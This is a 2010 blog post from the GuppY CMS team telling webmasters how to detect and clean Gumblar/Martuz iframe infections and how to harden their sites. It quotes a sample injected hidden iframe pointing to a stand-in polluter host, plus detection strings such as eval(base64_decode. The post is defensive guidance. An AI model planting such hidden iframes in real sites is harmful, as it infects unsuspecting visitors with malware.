BloggY - News

What to do after an attack on Iframe by Gumblar, Martuz, Troj / JSRedir-R ... ?  -  by GuppYTeam
Following repeated requests on the forum and although GuppY has nothing to do with safety issues related to this worm / Trojan that is known by different names and can attack any site regardless of its programming we give you below some information to fight these nuisances:

    * Gumblar, Martuz, Troj / JSRedir-R and others spread over the Internet via infected websites by taking advantage of vulnerabilities in softwares that are not updated by the administrators, webmasters, moderators or editors of sites that have access by FTP.
    * Some vulnerabilities have been identified including the Adobe software (Adobe Acrobat Reader, Adobe Flash Player, ...) not updated but it is not excluded that other software not updated may have potential flaws.
    * If the Trojan has managed to settle on an administrator's PC, (or a webmaster's, moderator's or editor's) of a site because they have no effective and updated antivirus, it retrieves the FTP access codes of the site and then, of course, any misdeed is possible.
    * The site will in turn be polluted by the pirates and will then pollute many others.

How do you realize that the site has been infected?

    * If your anti-virus or your anti-spyware displays an alert of iframe attack.
    * If Google or another search engine warns you that your site is dangerous.
    * If your host blocks the site for that reason.
    * If your browser redirects you to a suspicious site or ask if you accept this redirection.
    * If you find that new files and / or directories have been installed without your knowledge on your FTP or files weights have changed.
    * ...

What's going on with the infected site ?

    * Files are altered by iframe commands like this:

"<. Iframe src =" http://site_pollueur.cn:8080/index.php "width = 100 height = 150 style =" visibility: hidden "> </ iframe.> "

This is possible because iframes are often invisible on the site (visibility: hidden)

    * In some cases? hackers will install scripts that are more or less powerful, but able still to launch attacks from your site to other sites or even to your server.
    * In other cases, part of the code is encoded in Base64 which gives strings like this one:

Qm9uam91cg == which equals Hello confused
aWZyYW1l which equals iframe
confused

    * The most commonly infected files are index files with any extension (html, htm, php ,...), but any files and even images or false image files can be!
      

What to do in case of infection?

    * You must first scan your PC with an effective updated antivirus and/or antispyware. Note that the first antivirus or one of the first to detect and block these attacks is Avast even in its free version. It has then even been laughed at and was charged with generating "false positives".
    * Update Windows or whatever OS you have if it is not yet done.
    * Update your software (Adobe software in particular).
    * Ask all prospective administrators, moderators or editors of your sites to do the same.


As regards disinfection of the site (or sites) themselves if it runs under a Windows PC with a shared hosting:


    * Retrieve the local site via FTP and run the antivirus software.
    * Search for files that appear to be heavier or to have different weights.
    * Search all files for suspicious strings such as iframe, hidden, ... Notepad + +, among others, can do that and compare files with the same name (one original GuppY file from the pack together with a backup file from the polluted site).
    * Replace or repair the infected files and remove redundant files.
    * Run the antivirus again.
    * Change the FTP code -at least the password- if possible from another PC that has not been infected.
    * upload again the disinfected files and folders on the server.
    * Test the site on line after emptying the cache or the browsers.


If you have access to Linux / Unix console via SSH (in the case of a dedicated server, or a semi-dedicated, virtual, private server (VPS)) or if your website is hosted at home under Linux or Unix:

    * You can search on all or part of the server or sites hosted on it, using grep and find commands on the keywords listed above or others such as eval (base64_decode( (but in this case Linux/Unix regulars will manage.


Wise tips:

    * Update software and ask the other site administrators to do the same.
    * Update antivirus and anti spyxwares and ask the other site administrators to do the same.
    * Do not save FTP passwords in particular and enter them each time.
    * Chmod as many files as possible in 444 (read only) and in particular the index files and even .Htaccess files.


It is important not to chmod this way those files that have to be in read/write mode as data files and others that could not then be edited or incremented.

Another drawback of chmoding into read-only is that they will have to be put back into reading/writing 644-666) to add a patch or do a migration; but is the price to pay for some extra security.

    * There are also apps that are capable of eradicating these Trojans but they are usually charged ones.

We have gleaned these explanations here and there ; they are the fruit of our personal experiences and can't by no means be exhaustive, zll the more than malware are constantly changing.

For more information, you need to type one of the keywords below or more of them in Google or your favorite search engine:
Iframe Gumblar Martuz Troj / JSRedir-R

Good luck in case of infections!
JeandePeyrat for GuppY Team.
Published on 02/06/2010 @ 16:19   |